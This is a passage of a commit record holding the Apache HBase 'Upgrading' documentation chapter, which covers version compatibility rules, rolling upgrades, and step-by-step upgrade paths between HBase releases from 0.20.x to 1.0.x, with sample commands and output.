natoly\/hbase,vincentpoon\/hbase,vincentpoon\/hbase,apurtell\/hbase,andrewmains12\/hbase,andrewmains12\/hbase,apurtell\/hbase,ultratendency\/hbase,vincentpoon\/hbase,ChinmaySKulkarni\/hbase,ndimiduk\/hbase,SeekerResource\/hbase,francisliu\/hbase,ChinmaySKulkarni\/hbase,vincentpoon\/hbase,francisliu\/hbase,ndimiduk\/hbase,vincentpoon\/hbase,ndimiduk\/hbase,juwi\/hbase,Apache9\/hbase,HubSpot\/hbase,andrewmains12\/hbase,ndimiduk\/hbase,bijugs\/hbase,SeekerResource\/hbase,gustavoanatoly\/hbase,ndimiduk\/hbase,juwi\/hbase,narendragoyal\/hbase,JingchengDu\/hbase,vincentpoon\/hbase,HubSpot\/hbase,narendragoyal\/hbase,apurtell\/hbase,narendragoyal\/hbase,francisliu\/hbase,juwi\/hbase,mahak\/hbase,bijugs\/hbase,ndimiduk\/hbase,Eshcar\/hbase,juwi\/hbase,ultratendency\/hbase,HubSpot\/hbase,mahak\/hbase,ChinmaySKulkarni\/hbase,francisliu\/hbase,JingchengDu\/hbase,andrewmains12\/hbase,Apache9\/hbase,ultratendency\/hbase,SeekerResource\/hbase,ChinmaySKulkarni\/hbase,JingchengDu\/hbase,mahak\/hbase,vincentpoon\/hbase,apurtell\/hbase,gustavoanatoly\/hbase,HubSpot\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase,Eshcar\/hbase,juwi\/hbase,bijugs\/hbase,narendragoyal\/hbase,bijugs\/hbase,francisliu\/hbase","old_file":"src\/main\/asciidoc\/_chapters\/upgrading.adoc","new_file":"src\/main\/asciidoc\/_chapters\/upgrading.adoc","new_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[upgrading]]\n= Upgrading\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nYou cannot skip major versions when upgrading. If you are upgrading from version 0.90.x to 0.94.x, you must first go from 0.90.x to 0.92.x and then go from 0.92.x to 0.94.x.\n\nNOTE: It may be possible to skip across versions -- for example go from 0.92.2 straight to 0.98.0 just following the 0.96.x upgrade instructions -- but these scenarios are untested.\n\nReview <<configuration>>, in particular <<hadoop>>.\n\n[[hbase.versioning]]\n== HBase version number and compatibility\n\nHBase has two versioning schemes, pre-1.0 and post-1.0. Both are detailed below.\n\n[[hbase.versioning.post10]]\n=== Post 1.0 versions\n\nStarting with the 1.0.0 release, HBase is working towards link:http:\/\/semver.org\/[Semantic Versioning] for its release versioning. In summary:\n\n.Given a version number MAJOR.MINOR.PATCH, increment the:\n* MAJOR version when you make incompatible API changes,\n* MINOR version when you add functionality in a backwards-compatible manner, and\n* PATCH version when you make backwards-compatible bug fixes.\n* Additional labels for pre-release and build metadata are available as extensions to the MAJOR.MINOR.PATCH format.\n\n[[hbase.versioning.compat]]\n.Compatibility Dimensions\nIn addition to the usual API versioning considerations HBase has other compatibility dimensions that we need to consider.\n\n.Client-Server wire protocol compatibility\n* Allows updating client and server out of sync.\n* We could only allow upgrading the server first. I.e. the server would be backward compatible to an old client, that way new APIs are OK.\n* Example: A user should be able to use an old client to connect to an upgraded cluster.\n\n.Server-Server protocol compatibility\n* Servers of different versions can co-exist in the same cluster.\n* The wire protocol between servers is compatible.\n* Workers for distributed tasks, such as replication and log splitting, can co-exist in the same cluster.\n* Dependent protocols (such as using ZK for coordination) will also not be changed.\n* Example: A user can perform a rolling upgrade.\n\n.File format compatibility\n* Support file formats backward and forward compatible\n* Example: File, ZK encoding, directory layout is upgraded automatically as part of an HBase upgrade. User can rollback to the older version and everything will continue to work.\n\n.Client API compatibility\n* Allow changing or removing existing client APIs.\n* An API needs to deprecated for a major version before we will change\/remove it.\n* APIs available in a patch version will be available in all later patch versions. However, new APIs may be added which will not be available in earlier patch versions.\n* Example: A user using a newly deprecated api does not need to modify application code with hbase api calls until the next major version.\n\n.Client Binary compatibility\n* Client code written to APIs available in a given patch release can run unchanged (no recompilation needed) against the new jars of later patch versions.\n* Client code written to APIs available in a given patch release might not run against the old jars from an earlier patch version.\n* Example: Old compiled client code will work unchanged with the new jars.\n\n.Server-Side Limited API compatibility (taken from Hadoop)\n* Internal APIs are marked as Stable, Evolving, or Unstable\n* This implies binary compatibility for coprocessors and plugins (pluggable classes, including replication) as long as these are only using marked interfaces\/classes.\n* Example: Old compiled Coprocessor, Filter, or Plugin code will work unchanged with the new jars.\n\n.Dependency Compatibility\n* An upgrade of HBase will not require an incompatible upgrade of a dependent project, including the Java runtime.\n* Example: An upgrade of Hadoop will not invalidate any of the compatibilities guarantees we made.\n\n.Operational Compatibility\n* Metric changes\n* Behavioral changes of services\n* Web page APIs\n\n.Summary\n* A patch upgrade is a drop-in replacement. Any change that is not Java binary compatible would not be allowed.footnote:[See http:\/\/docs.oracle.com\/javase\/specs\/jls\/se7\/html\/jls-13.html.]. Downgrading versions within patch releases may not be compatible.\n\n* A minor upgrade requires no application\/client code modification. Ideally it would be a drop-in replacement but client code, coprocessors, filters, etc might have to be recompiled if new jars are used.\n\n* A major upgrade allows the HBase community to make breaking changes.\n\n.Compatibility Matrix footnote:[Note that this indicates what could break, not that it will break. We will\/should add specifics in our release notes.]\n[cols=\"1,1,1,1\"]\n|===\n| | Major | Minor | Patch\n|Client-Server wire Compatibility| N |Y |Y\n|Server-Server Compatibility |N |Y |Y\n|File Format Compatibility | N footnote:[comp_matrix_offline_upgrade_note,Running an offline upgrade tool without rollback might be needed. We will typically only support migrating data from major version X to major version X+1.] | Y |Y\n|Client API Compatibility | N | Y |Y\n|Client Binary Compatibility | N | N |Y\n4+|Server-Side Limited API Compatibility\n>| Stable | N | Y | Y\n>| Evolving | N |N |Y\n>| Unstable | N |N |N\n|Dependency Compatibility | N |Y |Y\n|Operational Compatibility | N |N |Y\n|===\n\n[[hbase.client.api.surface]]\n==== HBase API Surface\n\nHBase has a lot of API points, but for the compatibility matrix above, we differentiate between Client API, Limited Private API, and Private API. HBase uses a version of link:https:\/\/hadoop.apache.org\/docs\/current\/hadoop-project-dist\/hadoop-common\/Compatibility.html[Hadoop's Interface classification]. HBase's Interface classification classes can be found link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/classification\/package-summary.html[here].\n\n* InterfaceAudience: captures the intended audience, possible values are Public (for end users and external projects), LimitedPrivate (for other Projects, Coprocessors or other plugin points), and Private (for internal use).\n* InterfaceStability: describes what types of interface changes are permitted. Possible values are Stable, Evolving, Unstable, and Deprecated.\n\n[[hbase.client.api]]\nHBase Client API::\n HBase Client API consists of all the classes or methods that are marked with InterfaceAudience.Public interface. All main classes in hbase-client and dependent modules have either InterfaceAudience.Public, InterfaceAudience.LimitedPrivate, or InterfaceAudience.Private marker. Not all classes in other modules (hbase-server, etc) have the marker. If a class is not annotated with one of these, it is assumed to be a InterfaceAudience.Private class.\n\n[[hbase.limitetprivate.api]]\nHBase LimitedPrivate API::\n LimitedPrivate annotation comes with a set of target consumers for the interfaces. Those consumers are coprocessors, phoenix, replication endpoint implemnetations or similar. At this point, HBase only guarantees source and binary compatibility for these interfaces between patch versions.\n\n[[hbase.private.api]]\nHBase Private API::\n All classes annotated with InterfaceAudience.Private or all classes that do not have the annotation are for HBase internal use only. The interfaces and method signatures can change at any point in time. If you are relying on a particular interface that is marked Private, you should open a jira to propose changing the interface to be Public or LimitedPrivate, or an interface exposed for this purpose.\n\n[[hbase.versioning.pre10]]\n=== Pre 1.0 versions\n\nBefore the semantic versioning scheme pre-1.0, HBase tracked either Hadoop's versions (0.2x) or 0.9x versions. If you are into the arcane, checkout our old wiki page on link:http:\/\/wiki.apache.org\/hadoop\/Hbase\/HBaseVersions[HBase Versioning] which tries to connect the HBase version dots. Below sections cover ONLY the releases before 1.0.\n\n[[hbase.development.series]]\n.Odd\/Even Versioning or \"Development\" Series Releases\nAhead of big releases, we have been putting up preview versions to start the feedback cycle turning-over earlier. These \"Development\" Series releases, always odd-numbered, come with no guarantees, not even regards being able to upgrade between two sequential releases (we reserve the right to break compatibility across \"Development\" Series releases). Needless to say, these releases are not for production deploys. They are a preview of what is coming in the hope that interested parties will take the release for a test drive and flag us early if we there are issues we've missed ahead of our rolling a production-worthy release.\n\nOur first \"Development\" Series was the 0.89 set that came out ahead of HBase 0.90.0. HBase 0.95 is another \"Development\" Series that portends HBase 0.96.0. 0.99.x is the last series in \"developer preview\" mode before 1.0. Afterwards, we will be using semantic versioning naming scheme (see above).\n\n[[hbase.binary.compatibility]]\n.Binary Compatibility\nWhen we say two HBase versions are compatible, we mean that the versions are wire and binary compatible. Compatible HBase versions means that clients can talk to compatible but differently versioned servers. It means too that you can just swap out the jars of one version and replace them with the jars of another, compatible version and all will just work. Unless otherwise specified, HBase point versions are (mostly) binary compatible. You can safely do rolling upgrades between binary compatible versions; i.e. across point versions: e.g. from 0.94.5 to 0.94.6. See link:[Does compatibility between versions also mean binary compatibility?] discussion on the HBase dev mailing list.\n\n[[hbase.rolling.upgrade]]\n=== Rolling Upgrades\n\nA rolling upgrade is the process by which you update the servers in your cluster a server at a time. You can rolling upgrade across HBase versions if they are binary or wire compatible. See <<hbase.rolling.restart>> for more on what this means. Coarsely, a rolling upgrade is a graceful stop each server, update the software, and then restart. You do this for each server in the cluster. Usually you upgrade the Master first and then the RegionServers. See <<rolling>> for tools that can help use the rolling upgrade process.\n\nFor example, in the below, HBase was symlinked to the actual HBase install. On upgrade, before running a rolling restart over the cluser, we changed the symlink to point at the new HBase software version and then ran\n\n[source,bash]\n----\n$ HADOOP_HOME=~\/hadoop-2.6.0-CRC-SNAPSHOT ~\/hbase\/bin\/rolling-restart.sh --config ~\/conf_hbase\n----\n\nThe rolling-restart script will first gracefully stop and restart the master, and then each of the RegionServers in turn. Because the symlink was changed, on restart the server will come up using the new HBase version. Check logs for errors as the rolling upgrade proceeds.\n\n[[hbase.rolling.restart]]\n.Rolling Upgrade Between Versions that are Binary\/Wire Compatible\nUnless otherwise specified, HBase point versions are binary compatible. You can do a <<hbase.rolling.upgrade>> between HBase point versions. For example, you can go to 0.94.6 from 0.94.5 by doing a rolling upgrade across the cluster replacing the 0.94.5 binary with a 0.94.6 binary.\n\nIn the minor version-particular sections below, we call out where the versions are wire\/protocol compatible and in this case, it is also possible to do a <<hbase.rolling.upgrade>>. For example, in <<upgrade1.0.rolling.upgrade>>, we state that it is possible to do a rolling upgrade between hbase-0.98.x and hbase-1.0.0.\n\n== Upgrade Paths\n\n[[upgrade1.0]]\n=== Upgrading from 0.98.x to 1.0.x\n\nIn this section we first note the significant changes that come in with 1.0.0 HBase and then we go over the upgrade process. Be sure to read the significant changes section with care so you avoid surprises.\n\n==== Changes of Note!\n\nIn here we list important changes that are in 1.0.0 since 0.98.x., changes you should be aware that will go into effect once you upgrade.\n\n[[zookeeper.3.4]]\n.ZooKeeper 3.4 is required in HBase 1.0.0\nSee <<zookeeper.requirements>>.\n\n[[default.ports.changed]]\n.HBase Default Ports Changed\nThe ports used by HBase changed. They used to be in the 600XX range. In HBase 1.0.0 they have been moved up out of the ephemeral port range and are 160XX instead (Master web UI was 60010 and is now 16010; the RegionServer web UI was 60030 and is now 16030, etc.). If you want to keep the old port locations, copy the port setting configs from _hbase-default.xml_ into _hbase-site.xml_, change them back to the old values from the HBase 0.98.x era, and ensure you've distributed your configurations before you restart.\n\n[[upgrade1.0.hbase.bucketcache.percentage.in.combinedcache]]\n.hbase.bucketcache.percentage.in.combinedcache configuration has been REMOVED\nYou may have made use of this configuration if you are using BucketCache. If NOT using BucketCache, this change does not effect you. Its removal means that your L1 LruBlockCache is now sized using `hfile.block.cache.size` -- i.e. the way you would size the on-heap L1 LruBlockCache if you were NOT doing BucketCache -- and the BucketCache size is not whatever the setting for `hbase.bucketcache.size` is. You may need to adjust configs to get the LruBlockCache and BucketCache sizes set to what they were in 0.98.x and previous. If you did not set this config., its default value was 0.9. If you do nothing, your BucketCache will increase in size by 10%. Your L1 LruBlockCache will become `hfile.block.cache.size` times your java heap size (`hfile.block.cache.size` is a float between 0.0 and 1.0). To read more, see link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-11520[HBASE-11520 Simplify offheap cache config by removing the confusing \"hbase.bucketcache.percentage.in.combinedcache\"].\n\n[[hbase-12068]]\n.If you have your own customer filters.\nSee the release notes on the issue link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-12068[HBASE-12068 [Branch-1\\] Avoid need to always do KeyValueUtil#ensureKeyValue for Filter transformCell]; be sure to follow the recommendations therein.\n\n[[dlr]]\n.Distributed Log Replay\n<<distributed.log.replay>> is off by default in HBase 1.0.0. Enabling it can make a big difference improving HBase MTTR. Enable this feature if you are doing a clean stop\/start when you are upgrading. You cannot rolling upgrade to this feature (caveat if you are running on a version of HBase in excess of HBase 0.98.4 -- see link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-12577[HBASE-12577 Disable distributed log replay by default] for more).\n\n[[upgrade1.0.rolling.upgrade]]\n==== Rolling upgrade from 0.98.x to HBase 1.0.0\n.From 0.96.x to 1.0.0\nNOTE: You cannot do a <<hbase.rolling.upgrade,rolling upgrade>> from 0.96.x to 1.0.0 without first doing a rolling upgrade to 0.98.x. See comment in link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-11164?focusedCommentId=14182330&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-14182330[HBASE-11164 Document and test rolling updates from 0.98 -> 1.0] for the why. Also because HBase 1.0.0 enables HFile v3 by default, link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-9801[HBASE-9801 Change the default HFile version to V3], and support for HFile v3 only arrives in 0.98, this is another reason you cannot rolling upgrade from HBase 0.96.x; if the rolling upgrade stalls, the 0.96.x servers cannot open files written by the servers running the newer HBase 1.0.0 with HFile's of version 3.\n\nThere are no known issues running a <<hbase.rolling.upgrade,rolling upgrade>> from HBase 0.98.x to HBase 1.0.0.\n\n[[upgrade1.0.from.0.94]]\n==== Upgrading to 1.0 from 0.94\nYou cannot rolling upgrade from 0.94.x to 1.x.x. You must stop your cluster, install the 1.x.x software, run the migration described at <<executing.the.0.96.upgrade>> (substituting 1.x.x. wherever we make mention of 0.96.x in the section below), and then restart. Be sure to upgrade your ZooKeeper if it is a version less than the required 3.4.x.\n\n[[upgrade0.98]]\n=== Upgrading from 0.96.x to 0.98.x\nA rolling upgrade from 0.96.x to 0.98.x works. The two versions are not binary compatible.\n\nAdditional steps are required to take advantage of some of the new features of 0.98.x, including cell visibility labels, cell ACLs, and transparent server side encryption. See <<security>> for more information. Significant performance improvements include a change to the write ahead log threading model that provides higher transaction throughput under high load, reverse scanners, MapReduce over snapshot files, and striped compaction.\n\nClients and servers can run with 0.98.x and 0.96.x versions. However, applications may need to be recompiled due to changes in the Java API.\n\n=== Upgrading from 0.94.x to 0.98.x\nA rolling upgrade from 0.94.x directly to 0.98.x does not work. The upgrade path follows the same procedures as <<upgrade0.96>>. Additional steps are required to use some of the new features of 0.98.x. See <<upgrade0.98>> for an abbreviated list of these features.\n\n[[upgrade0.96]]\n=== Upgrading from 0.94.x to 0.96.x\n\n==== The \"Singularity\"\n\n.HBase 0.96.x was EOL'd, September 1st, 2014\nNOTE: Do not deploy 0.96.x Deploy at least 0.98.x. See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-11642[EOL 0.96].\n\nYou will have to stop your old 0.94.x cluster completely to upgrade. If you are replicating between clusters, both clusters will have to go down to upgrade. Make sure it is a clean shutdown. The less WAL files around, the faster the upgrade will run (the upgrade will split any log files it finds in the filesystem as part of the upgrade process). All clients must be upgraded to 0.96 too.\n\nThe API has changed. You will need to recompile your code against 0.96 and you may need to adjust applications to go against new APIs (TODO: List of changes).\n\n[[executing.the.0.96.upgrade]]\n==== Executing the 0.96 Upgrade\n\n.HDFS and ZooKeeper must be up!\nNOTE: HDFS and ZooKeeper should be up and running during the upgrade process.\n\nHBase 0.96.0 comes with an upgrade script. Run\n\n[source,bash]\n----\n$ bin\/hbase upgrade\n----\nto see its usage. The script has two main modes: `-check`, and `-execute`.\n\n.check\nThe check step is run against a running 0.94 cluster. Run it from a downloaded 0.96.x binary. The check step is looking for the presence of HFile v1 files. These are unsupported in HBase 0.96.0. To have them rewritten as HFile v2 you must run a compaction.\n\nThe check step prints stats at the end of its run (grep for `\u201cResult:\u201d` in the log) printing absolute path of the tables it scanned, any HFile v1 files found, the regions containing said files (these regions will need a major compaction), and any corrupted files if found. A corrupt file is unreadable, and so is undefined (neither HFile v1 nor HFile v2).\n\nTo run the check step, run\n\n[source,bash]\n----\n$ bin\/hbase upgrade -check\n----\n\nHere is sample output:\n----\nTables Processed:\nhdfs:\/\/localhost:41020\/myHBase\/.META.\nhdfs:\/\/localhost:41020\/myHBase\/usertable\nhdfs:\/\/localhost:41020\/myHBase\/TestTable\nhdfs:\/\/localhost:41020\/myHBase\/t\n\nCount of HFileV1: 2\nHFileV1:\nhdfs:\/\/localhost:41020\/myHBase\/usertable \/fa02dac1f38d03577bd0f7e666f12812\/family\/249450144068442524\nhdfs:\/\/localhost:41020\/myHBase\/usertable \/ecdd3eaee2d2fcf8184ac025555bb2af\/family\/249450144068442512\n\nCount of corrupted files: 1\nCorrupted Files:\nhdfs:\/\/localhost:41020\/myHBase\/usertable\/fa02dac1f38d03577bd0f7e666f12812\/family\/1\nCount of Regions with HFileV1: 2\nRegions to Major Compact:\nhdfs:\/\/localhost:41020\/myHBase\/usertable\/fa02dac1f38d03577bd0f7e666f12812\nhdfs:\/\/localhost:41020\/myHBase\/usertable\/ecdd3eaee2d2fcf8184ac025555bb2af\n\nThere are some HFileV1, or corrupt files (files with incorrect major version)\n----\n\nIn the above sample output, there are two HFile v1 files in two regions, and one corrupt file. Corrupt files should probably be removed. The regions that have HFile v1s need to be major compacted. To major compact, start up the hbase shell and review how to compact an individual region. After the major compaction is done, rerun the check step and the HFile v1 files should be gone, replaced by HFile v2 instances.\n\nBy default, the check step scans the HBase root directory (defined as `hbase.rootdir` in the configuration). To scan a specific directory only, pass the `-dir` option.\n[source,bash]\n----\n$ bin\/hbase upgrade -check -dir \/myHBase\/testTable\n----\nThe above command would detect HFile v1 files in the _\/myHBase\/testTable_ directory.\n\nOnce the check step reports all the HFile v1 files have been rewritten, it is safe to proceed with the upgrade.\n\n.execute\nAfter the _check_ step shows the cluster is free of HFile v1, it is safe to proceed with the upgrade. Next is the _execute_ step. You must *SHUTDOWN YOUR 0.94.x CLUSTER* before you can run the execute step. The execute step will not run if it detects running HBase masters or RegionServers.\n\n[NOTE]\n====\nHDFS and ZooKeeper should be up and running during the upgrade process. If zookeeper is managed by HBase, then you can start zookeeper so it is available to the upgrade by running\n[source,bash]\n----\n$ .\/hbase\/bin\/hbase-daemon.sh start zookeeper\n----\n====\n\nThe execute upgrade step is made of three substeps.\n\n* Namespaces: HBase 0.96.0 has support for namespaces. The upgrade needs to reorder directories in the filesystem for namespaces to work.\n\n* ZNodes: All znodes are purged so that new ones can be written in their place using a new protobuf'ed format and a few are migrated in place: e.g. replication and table state znodes\n\n* WAL Log Splitting: If the 0.94.x cluster shutdown was not clean, we'll split WAL logs as part of migration before we startup on 0.96.0. This WAL splitting runs slower than the native distributed WAL splitting because it is all inside the single upgrade process (so try and get a clean shutdown of the 0.94.0 cluster if you can).\n\nTo run the _execute_ step, make sure that first you have copied HBase 0.96.0 binaries everywhere under servers and under clients. Make sure the 0.94.0 cluster is down. Then do as follows:\n[source,bash]\n----\n$ bin\/hbase upgrade -execute\n----\nHere is some sample output.\n\n----\nStarting Namespace upgrade\nCreated version file at hdfs:\/\/localhost:41020\/myHBase with version=7\nMigrating table testTable to hdfs:\/\/localhost:41020\/myHBase\/.data\/default\/testTable\n.....\nCreated version file at hdfs:\/\/localhost:41020\/myHBase with version=8\nSuccessfully completed NameSpace upgrade.\nStarting Znode upgrade\n.....\nSuccessfully completed Znode upgrade\n\nStarting Log splitting\n...\nSuccessfully completed Log splitting\n----\n\nIf the output from the execute step looks good, stop the zookeeper instance you started to do the upgrade:\n[source,bash]\n----\n$ .\/hbase\/bin\/hbase-daemon.sh stop zookeeper\n----\nNow start up hbase-0.96.0.\n\n[[s096.migration.troubleshooting]]\n=== Troubleshooting\n\n[[s096.migration.troubleshooting.old.client]]\n.Old Client connecting to 0.96 cluster\nIt will fail with an exception like the below. Upgrade.\n----\n17:22:15 Exception in thread \"main\" java.lang.IllegalArgumentException: Not a host:port pair: PBUF\n17:22:15 *\n17:22:15 api-compat-8.ent.cloudera.com \ufffd\ufffd \ufffd\ufffd\ufffd(\n17:22:15 at org.apache.hadoop.hbase.util.Addressing.parseHostname(Addressing.java:60)\n17:22:15 at org.apache.hadoop.hbase.ServerName.&init>(ServerName.java:101)\n17:22:15 at org.apache.hadoop.hbase.ServerName.parseVersionedServerName(ServerName.java:283)\n17:22:15 at org.apache.hadoop.hbase.MasterAddressTracker.bytesToServerName(MasterAddressTracker.java:77)\n17:22:15 at org.apache.hadoop.hbase.MasterAddressTracker.getMasterAddress(MasterAddressTracker.java:61)\n17:22:15 at org.apache.hadoop.hbase.client.HConnectionManager$HConnectionImplementation.getMaster(HConnectionManager.java:703)\n17:22:15 at org.apache.hadoop.hbase.client.HBaseAdmin.&init>(HBaseAdmin.java:126)\n17:22:15 at Client_4_3_0.setup(Client_4_3_0.java:716)\n17:22:15 at Client_4_3_0.main(Client_4_3_0.java:63)\n----\n\n==== Upgrading `META` to use Protocol Buffers (Protobuf)\n\nWhen you upgrade from versions prior to 0.96, `META` needs to be converted to use protocol buffers. This is controlled by the configuration option `hbase.MetaMigrationConvertingToPB`, which is set to `true` by default. Therefore, by default, no action is required on your part.\n\nThe migration is a one-time event. However, every time your cluster starts, `META` is scanned to ensure that it does not need to be converted. If you have a very large number of regions, this scan can take a long time. Starting in 0.98.5, you can set `hbase.MetaMigrationConvertingToPB` to `false` in _hbase-site.xml_, to disable this start-up scan. This should be considered an expert-level setting.\n\n[[upgrade0.94]]\n=== Upgrading from 0.92.x to 0.94.x\nWe used to think that 0.92 and 0.94 were interface compatible and that you can do a rolling upgrade between these versions but then we figured that link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-5357[HBASE-5357 Use builder pattern in HColumnDescriptor] changed method signatures so rather than return `void` they instead return `HColumnDescriptor`. This will throw`java.lang.NoSuchMethodError: org.apache.hadoop.hbase.HColumnDescriptor.setMaxVersions(I)V` so 0.92 and 0.94 are NOT compatible. You cannot do a rolling upgrade between them.\n\n[[upgrade0.92]]\n=== Upgrading from 0.90.x to 0.92.x\n==== Upgrade Guide\nYou will find that 0.92.0 runs a little differently to 0.90.x releases. Here are a few things to watch out for upgrading from 0.90.x to 0.92.0.\n\n.tl:dr\n[NOTE]\n====\nThese are the important things to know before upgrading.\n. Once you upgrade, you can\u2019t go back.\n\n. MSLAB is on by default. Watch that heap usage if you have a lot of regions.\n\n. Distributed Log Splitting is on by default. It should make RegionServer failover faster.\n\n. There\u2019s a separate tarball for security.\n\n. If `-XX:MaxDirectMemorySize` is set in your _hbase-env.sh_, it\u2019s going to enable the experimental off-heap cache (You may not want this).\n====\n\n.You can\u2019t go back!\nTo move to 0.92.0, all you need to do is shutdown your cluster, replace your HBase 0.90.x with HBase 0.92.0 binaries (be sure you clear out all 0.90.x instances) and restart (You cannot do a rolling restart from 0.90.x to 0.92.x -- you must restart). On startup, the `.META.` table content is rewritten removing the table schema from the `info:regioninfo` column. Also, any flushes done post first startup will write out data in the new 0.92.0 file format, <<hfilev2>>. This means you cannot go back to 0.90.x once you\u2019ve started HBase 0.92.0 over your HBase data directory.\n\n.MSLAB is ON by default\nIn 0.92.0, the `<<hbase.hregion.memstore.mslab.enabled,hbase.hregion.memstore.mslab.enabled>>` flag is set to `true` (See <<gcpause>>). In 0.90.x it was false. When it is enabled, memstores will step allocate memory in MSLAB 2MB chunks even if the memstore has zero or just a few small elements. This is fine usually but if you had lots of regions per RegionServer in a 0.90.x cluster (and MSLAB was off), you may find yourself OOME'ing on upgrade because the `thousands of regions * number of column families * 2MB MSLAB` (at a minimum) puts your heap over the top. Set `hbase.hregion.memstore.mslab.enabled` to `false` or set the MSLAB size down from 2MB by setting `hbase.hregion.memstore.mslab.chunksize` to something less.\n\n[[dls]]\n.Distributed Log Splitting is on by default\nPrevious, WAL logs on crash were split by the Master alone. In 0.92.0, log splitting is done by the cluster (See link:https:\/\/issues.apache.org\/jira\/browse\/hbase-1364[HBASE-1364 [performance\\] Distributed splitting of regionserver commit logs] or see the blog post link:http:\/\/blog.cloudera.com\/blog\/2012\/07\/hbase-log-splitting\/[Apache HBase Log Splitting]). This should cut down significantly on the amount of time it takes splitting logs and getting regions back online again.\n\n.Memory accounting is different now\nIn 0.92.0, <<hfilev2>> indices and bloom filters take up residence in the same LRU used caching blocks that come from the filesystem. In 0.90.x, the HFile v1 indices lived outside of the LRU so they took up space even if the index was on a \u2018cold\u2019 file, one that wasn\u2019t being actively used. With the indices now in the LRU, you may find you have less space for block caching. Adjust your block cache accordingly. See the <<block.cache>> for more detail. The block size default size has been changed in 0.92.0 from 0.2 (20 percent of heap) to 0.25.\n\n.On the Hadoop version to use\nRun 0.92.0 on Hadoop 1.0.x (or CDH3u3). The performance benefits are worth making the move. Otherwise, our Hadoop prescription is as it has been; you need an Hadoop that supports a working sync. See <<hadoop>>.\n\nIf running on Hadoop 1.0.x (or CDH3u3), enable local read. See link:http:\/\/files.meetup.com\/1350427\/hug_ebay_jdcryans.pdf[Practical Caching] presentation for ruminations on the performance benefits \u2018going local\u2019 (and for how to enable local reads).\n\n.HBase 0.92.0 ships with ZooKeeper 3.4.2\nIf you can, upgrade your ZooKeeper. If you can\u2019t, 3.4.2 clients should work against 3.3.X ensembles (HBase makes use of 3.4.2 API).\n\n.Online alter is off by default\nIn 0.92.0, we\u2019ve added an experimental online schema alter facility (See <<hbase.online.schema.update.enable,hbase.online.schema.update.enable>>). It's off by default. Enable it at your own risk. Online alter and splitting tables do not play well together so be sure your cluster quiescent using this feature (for now).\n\n.WebUI\nThe web UI has had a few additions made in 0.92.0. It now shows a list of the regions currently transitioning, recent compactions\/flushes, and a process list of running processes (usually empty if all is well and requests are being handled promptly). Other additions including requests by region, a debugging servlet dump, etc.\n\n.Security tarball\nWe now ship with two tarballs; secure and insecure HBase. Documentation on how to setup a secure HBase is on the way.\n\n.Changes in HBase replication\n0.92.0 adds two new features: multi-slave and multi-master replication. The way to enable this is the same as adding a new peer, so in order to have multi-master you would just run add_peer for each cluster that acts as a master to the other slave clusters. Collisions are handled at the timestamp level which may or may not be what you want, this needs to be evaluated on a per use case basis. Replication is still experimental in 0.92 and is disabled by default, run it at your own risk.\n\n.RegionServer now aborts if OOME\nIf an OOME, we now have the JVM kill -9 the RegionServer process so it goes down fast. Previous, a RegionServer might stick around after incurring an OOME limping along in some wounded state. To disable this facility, and recommend you leave it in place, you\u2019d need to edit the bin\/hbase file. Look for the addition of the -XX:OnOutOfMemoryError=\"kill -9 %p\" arguments (See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4769[HBASE-4769 - \u2018Abort RegionServer Immediately on OOME\u2019]).\n\n.HFile v2 and the \u201cBigger, Fewer\u201d Tendency\n0.92.0 stores data in a new format, <<hfilev2>>. As HBase runs, it will move all your data from HFile v1 to HFile v2 format. This auto-migration will run in the background as flushes and compactions run. HFile v2 allows HBase run with larger regions\/files. In fact, we encourage that all HBasers going forward tend toward Facebook axiom #1, run with larger, fewer regions. If you have lots of regions now -- more than 100s per host -- you should look into setting your region size up after you move to 0.92.0 (In 0.92.0, default size is now 1G, up from 256M), and then running online merge tool (See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-1621[HBASE-1621 merge tool should work on online cluster, but disabled table]).\n\n[[upgrade0.90]]\n=== Upgrading to HBase 0.90.x from 0.20.x or 0.89.x\nThis version of 0.90.x HBase can be started on data written by HBase 0.20.x or HBase 0.89.x. There is no need of a migration step. HBase 0.89.x and 0.90.x does write out the name of region directories differently -- it names them with a md5 hash of the region name rather than a jenkins hash -- so this means that once started, there is no going back to HBase 0.20.x.\n\nBe sure to remove the _hbase-default.xml_ from your _conf_ directory on upgrade. A 0.20.x version of this file will have sub-optimal configurations for 0.90.x HBase. The _hbase-default.xml_ file is now bundled into the HBase jar and read from there. If you would like to review the content of this file, see it in the src tree at _src\/main\/resources\/hbase-default.xml_ or see <<hbase_default_configurations>>.\n\nFinally, if upgrading from 0.20.x, check your .META. schema in the shell. In the past we would recommend that users run with a 16kb MEMSTORE_FLUSHSIZE. Run\n----\nhbase> scan '-ROOT-'\n----\nin the shell. This will output the current `.META.` schema. Check `MEMSTORE_FLUSHSIZE` size. Is it 16kb (16384)? If so, you will need to change this (The 'normal'\/default value is 64MB (67108864)). Run the script `bin\/set_meta_memstore_size.rb`. This will make the necessary edit to your `.META.` schema. Failure to run this change will make for a slow cluster. See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-3499[HBASE-3499 Users upgrading to 0.90.0 need to have their .META. table updated with the right MEMSTORE_SIZE].\n","old_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed 